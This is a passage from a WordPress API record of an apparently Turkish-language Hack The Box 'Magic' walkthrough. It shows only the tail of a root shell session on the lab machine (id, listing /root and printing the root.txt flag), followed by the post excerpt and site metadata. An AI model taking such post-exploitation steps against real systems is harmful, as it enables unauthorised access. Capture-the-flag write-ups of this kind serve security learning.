id\nid\nuid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)\n# cd \/root\ncd \/root\n# ls\nls\ninfo.c  root.txt  snap\n# cat root.txt \ncat root.txt\nTraceback (most recent call last):\n  File &quot;&lt;string&gt;&quot;, line 1, in &lt;module&gt;\nConnectionRefusedError: [Errno 111] Connection refused\n# more root.txt\nmore root.txt\n460fc11a0bec04f180622febe662970c\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Makine Ad\u0131 Seviye OS Logo Magic &#8211; HTB Orta Linux Walkthrough nmap taramas\u0131 ile ba\u015flayal\u0131m. PORT STATE SERVICE VERSION 22\/tcp open ssh OpenSSH 7.6p1 Ubuntu&#8230;<\/p>\n<div class=\"more-link-wrapper\"><a class=\"more-link\" href=\"https:\/\/berenkudaygorun.com\/blog\/blog\/2021\/08\/13\/magic\/\">Devam\u0131n\u0131 oku<span class=\"screen-reader-text\">Magic<\/span><\/a><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[37,498],"tags":[506],"class_list":["post-1503","post","type-post","status-publish","format-standard","hentry","category-sql","category-walkthrough","tag-file-upload","entry"],"_links":{"self":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1503","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/comments?post=1503"}],"version-history":[{"count":1,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1503\/revisions"}],"predecessor-version":[{"id":1504,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/posts\/1503\/revisions\/1504"}],"wp:attachment":[{"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/media?parent=1503"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/categories?post=1503"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/berenkudaygorun.com\/blog\/wp-json\/wp\/v2\/tags?post=1503"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}